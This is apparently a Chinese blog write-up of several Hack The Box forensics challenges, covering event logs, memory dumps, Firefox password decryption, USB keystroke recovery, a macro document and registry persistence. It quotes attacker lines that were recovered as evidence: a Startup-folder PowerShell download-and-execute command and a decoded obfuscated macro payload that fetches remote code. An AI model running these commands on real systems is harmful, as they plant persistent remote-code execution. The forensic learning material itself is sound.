HTB蓝队路径取证分析

Event Horizon

题目:我们 CEO 的计算机在一次网络钓鱼攻击中被入侵。攻击者小心地清除了 PowerShell 日志，所以我们不知道他们执行了什么。你能帮我们吗？

下载有一个logs目录，看样子是windows的事件分析，根据大小进行排序

Microsoft-Windows-PowerShell%4Operational.evtx这个文件存放的是powershell事件，所以与题目有关。

用windows自带的事件查看器打开，发现第一条就是一个关于mimikatz的警告，事件号是4100，代表因为限制策略而被阻止运行，比如mimikatz转存哈希就需要管理员权限,筛选了4100看一遍但是没有有效的信息

筛选4104事件，因为是远程执行代码，按时间降序，最早的那个事件中找到flag

Export

┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol2 -f WIN-LQS146OE2S1-20201027-142607.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/mikannse/Desktop/WIN-LQS146OE2S1-20201027-142607.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80001a540a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80001a55d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2020-10-27 14:26:09 UTC+0000
     Image local date and time : 2020-10-27 19:56:09 +0530

┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol2 -f WIN-LQS146OE2S1-20201027-142607.raw --profile=Win7SP1x64 cmdscan
Volatility Foundation Volatility Framework 2.6.1
**************************************************
CommandProcess: conhost.exe Pid: 1780
CommandHistory: 0x257430 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 @ 0x23bde0: echo iex(iwr "http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D.ps1") > C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3usy12fv.ps1
**************************************************
CommandProcess: conhost.exe Pid: 1796
CommandHistory: 0x2c6a90 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60

发现执行了这们一个脚本,对SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=进行base64解码，得到flag

Insider

得到了火狐的配置文件,了解一下各文件的内容: https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data

其中，用户的密码是加密过的，但是能够利用 https://github.com/unode/firefox_decrypt 进行解密

┌──(mikannse㉿kali)-[~/tools/other/firefox_decrypt]
└─$ python firefox_decrypt.py ~/Desktop/Mozilla/Firefox/        
Select the Mozilla profile you wish to decrypt
1 -> Profiles/yodxf5e0.default
2 -> Profiles/2542z9mo.default-release
2

Website:   http://acc01:8080
Username: 'admin'
Password: 'HTB{ur_8RoW53R_H157Ory}'

Logger

是一个USB流量，wireshark打开，先根据info进行排序,找到USB设备对主机发送的DESCRIPTOR Response DEVICE

根据idProduct可以看到1.16.0是一个键盘设备的集线器那么设备地址1.16.1就是这根集线器上的第一个设备地址

提取:

┌──(mikannse㉿kali)-[~/Desktop]
└─$ tshark -r keystrokes.pcapng -Y "usb.src == 1.16.1" -T fields -e usbhid.data>key.txt

利用脚本进行转换:

#!/usr/bin/python
# coding: utf-8
from __future__ import print_function
import sys, os

lcasekey = {}
ucasekey = {}

lcasekey[4]="a"; ucasekey[4]="A"
lcasekey[5]="b"; ucasekey[5]="B"
lcasekey[6]="c"; ucasekey[6]="C"
lcasekey[7]="d"; ucasekey[7]="D"
lcasekey[8]="e"; ucasekey[8]="E"
lcasekey[9]="f"; ucasekey[9]="F"
lcasekey[10]="g"; ucasekey[10]="G"
lcasekey[11]="h"; ucasekey[11]="H"
lcasekey[12]="i"; ucasekey[12]="I"
lcasekey[13]="j"; ucasekey[13]="J"
lcasekey[14]="k"; ucasekey[14]="K"
lcasekey[15]="l"; ucasekey[15]="L"
lcasekey[16]="m"; ucasekey[16]="M"
lcasekey[17]="n"; ucasekey[17]="N"
lcasekey[18]="o"; ucasekey[18]="O"
lcasekey[19]="p"; ucasekey[19]="P"
lcasekey[20]="q"; ucasekey[20]="Q"
lcasekey[21]="r"; ucasekey[21]="R"
lcasekey[22]="s"; ucasekey[22]="S"
lcasekey[23]="t"; ucasekey[23]="T"
lcasekey[24]="u"; ucasekey[24]="U"
lcasekey[25]="v"; ucasekey[25]="V"
lcasekey[26]="w"; ucasekey[26]="W"
lcasekey[27]="x"; ucasekey[27]="X"
lcasekey[28]="y"; ucasekey[28]="Y"
lcasekey[29]="z"; ucasekey[29]="Z"
lcasekey[30]="1"; ucasekey[30]="!"
lcasekey[31]="2"; ucasekey[31]="@"
lcasekey[32]="3"; ucasekey[32]="#"
lcasekey[33]="4"; ucasekey[33]="$"
lcasekey[34]="5"; ucasekey[34]="%"
lcasekey[35]="6"; ucasekey[35]="^"
lcasekey[36]="7"; ucasekey[36]="&"
lcasekey[37]="8"; ucasekey[37]="*"
lcasekey[38]="9"; ucasekey[38]="("
lcasekey[39]="0"; ucasekey[39]=")"
lcasekey[40]="Enter"; ucasekey[40]="Enter"
lcasekey[41]="esc"; ucasekey[41]="esc"
lcasekey[42]="del"; ucasekey[42]="del"
lcasekey[43]="tab"; ucasekey[43]="tab"
lcasekey[44]="space"; ucasekey[44]="space"
lcasekey[45]="-"; ucasekey[45]="_"
lcasekey[46]="="; ucasekey[46]="+"
lcasekey[47]="["; ucasekey[47]="{"
lcasekey[48]="]"; ucasekey[48]="}"
lcasekey[49]="\\"; ucasekey[49]="|"
lcasekey[50]=" "; ucasekey[50]=" "
lcasekey[51]="("; ucasekey[51]=":"
lcasekey[52]="'"; ucasekey[52]="\""
lcasekey[53]="`"; ucasekey[53]="~"
lcasekey[54]=","; ucasekey[54]="<"
lcasekey[55]="."; ucasekey[55]=">"
lcasekey[56]="/"; ucasekey[56]="?"
lcasekey[57]="CapsLock"; ucasekey[57]="CapsLock"
lcasekey[79]="RightArrow"; ucasekey[79]="RightArrow"
lcasekey[80]="LeftArrow"; ucasekey[80]="LeftArrow"
lcasekey[84]="/"; ucasekey[84]="/"
lcasekey[85]="*"; ucasekey[85]="*"
lcasekey[86]="-"; ucasekey[86]="-"
lcasekey[87]="+"; ucasekey[87]="+"
lcasekey[88]="Enter"; ucasekey[88]="Enter"
lcasekey[89]="1"; ucasekey[89]="1"
lcasekey[90]="2"; ucasekey[90]="2"
lcasekey[91]="3"; ucasekey[91]="3"
lcasekey[92]="4"; ucasekey[92]="4"
lcasekey[93]="5"; ucasekey[93]="5"
lcasekey[94]="6"; ucasekey[94]="6"
lcasekey[95]="7"; ucasekey[95]="7"
lcasekey[96]="8"; ucasekey[96]="8"
lcasekey[97]="9"; ucasekey[97]="9"
lcasekey[98]="0"; ucasekey[98]="0"
lcasekey[99]="."; ucasekey[99]="."

# Make sure filename to open has been provided
if len(sys.argv) == 2:
    keycodes = open(sys.argv[1])
    for line in keycodes:
        # Dump line to bytearray
        bytesArray = bytearray.fromhex(line.strip())
        # See if we have a key code
        val = int(bytesArray[2])
        if val > 3 and val < 100:
            # See if left shift or right shift was held down
            if bytesArray[0] == 0x02 or bytesArray[0] == 0x20:
                print(ucasekey[int(bytesArray[2])], end='')  # Single line output
                # print(ucasekey[int(bytesArray[2])]) # Newline output
            else:
                print(lcasekey[int(bytesArray[2])], end='')  # Single line output
                # print(lcasekey[int(bytesArray[2])]) # Newline output
else:
    print("USAGE: python %s [filename]" % os.path.basename(__file__))

┌──(mikannse㉿kali)-[~/tools/other/USB_pcapng]
└─$ python keyboard.py key.txt 
CapsLockhtb{CapsLocki_CapsLockc4n_533_CapsLockyCapsLockouCapsLockr_CapsLockk3y2CapsLock}                                                                                                     
┌──(mikannse㉿kali)-[~/tools/other/USB_pcapng]
└─$ HTB{i_C4N_533_yOUr_K3Y2}

CapsLock表示转换大写输入

Lure

得到一个word,显示有宏脚本。直接strings，有一段很长的powershell脚本,base64解码一下

┌──(mikannse㉿kali)-[~/Desktop]
└─$ echo 'cABPAHcARQByAHMAaABFAGwATAAgACQAKAAtAGoATwBpAE4AKAAoACQAUABzAGgATwBNAGUAWwA0AF0AKQAsACgAIgAkAFAAcwBIAG8ATQBFACIAKQBbACsAMQA1AF0ALAAiAHgAIgApADsAKQAoAGkAdwByACAAJAAoACgAIgB7ADUAfQB7ADIANQB9AHsAOAB9AHsANwB9AHsAMAB9AHsAMQA0AH0AewAzAH0AewAyADEAfQB7ADIAfQB7ADIAMgB9AHsAMQA1AH0AewAxADYAfQB7ADMAMQB9AHsAMgA4AH0AewAxADEAfQB7ADIANgB9AHsAMQA3AH0AewAyADMAfQB7ADIANwB9AHsAMgA5AH0AewAxADAAfQB7ADEAfQB7ADYAfQB7ADIANAB9AHsAMwAwAH0AewAxADgAfQB7ADEAMwB9AHsAMQA5AH0AewAxADIAfQB7ADkAfQB7ADIAMAB9AHsANAB9ACIALQBmACAAIgBCACIALAAiAFUAIgAsACIANAAiACwAIgBCACIALAAiACUANwBEACIALAAiAGgAdAAiACwAIgBSAF8AZAAiACwAIgAvAC8AbwB3AC4AbAB5AC8ASABUACIALAAiAHAAOgAiACwAIgBUACIALAAiADAAIgAsACIAXwAiACwAIgBOACIALAAiAE0AIgAsACIAJQA3ACIALAAiAEUAIgAsACIAZgAiACwAIgAxAFQAIgAsACIAdQAiACwAIgBlACIALAAiADUAIgAsACIAawAiACwAIgBSACIALAAiAGgAIgAsACIAMAAiACwAIgB0ACIALAAiAHcAIgAsACIAXwAiACwAIgBsACIALAAiAFkAIgAsACIAQwAiACwAIgBVACIAKQApACkA'|base64 -d
pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $(("{5}{25}{8}{7}{0}{14}{3}{21}{2}{22}{15}{16}{31}{28}{11}{26}{17}{23}{27}{29}{10}{1}{6}{24}{30}{18}{13}{19}{12}{9}{20}{4}"-f "B","U","4","B","%7D","ht","R_d","//ow.ly/HT","p:","T","0","_","N","M","%7","E","f","1T","u","e","5","k","R","h","0","t","w","_","l","Y","C","U"))) 

像是经过混淆的powershell

利用: https://github.com/pan-unit42/public_tools/blob/master/powershellprofiler/PowerShellProfiler.py 进行反混淆

┌──(mikannse㉿kali)-[~/tools/other]
└─$ python3 Powershellprofiler.py -f ~/Desktop/shell.ps1 -
<SNIP>
##### ALTERED SCRIPT #####

pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $("http://ow.ly/HTB%7Bk4REfUl_w1Th_Y0UR_d0CuMeNT5%7D"))

url解码一下

No Place To Hide

得到了一个RDP的缓存文件，并且是以位图形式缓存的,使用bmc-tool

┌──(mikannse㉿kali)-[~/tools/other/bmc-tools]
└─$ ./bmc-tools.py -s ~/Desktop/Cache0000.bin -d ~/Desktop/out/
[+++] Processing a single file: '/home/mikannse/Desktop/Cache0000.bin'.
[===] 1162 tiles successfully extracted in the end.
[===] Successfully exported 1162 files.

在bin_104拼接找到flag

HTB{w47ch_y0ur_c0Nn3C71}

Persistence

┌──(mikannse㉿kali)-[~/Desktop]
└─$ file query 
query: MS Windows registry file, NT/2000 or above

像是注册表信息,是很老的操作系统采用的…

https://github.com/keydet89/RegRipper3.0 打开注册表文件,然后可以导出一个txt

做持久性，一般涉及到的注册表为:

“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce”
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices”
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce”

查找Run,找到一个执行文件

Software\Microsoft\Windows\CurrentVersion\Run
LastWrite Time 2020-10-27 04:38:55Z
  Windows Update - C:\Windows\System32\SFRCezFfQzRuX2t3M3J5XzRMUjE5aDd9.exe

HTB{1_C4n_kw3ry_4LR19h7}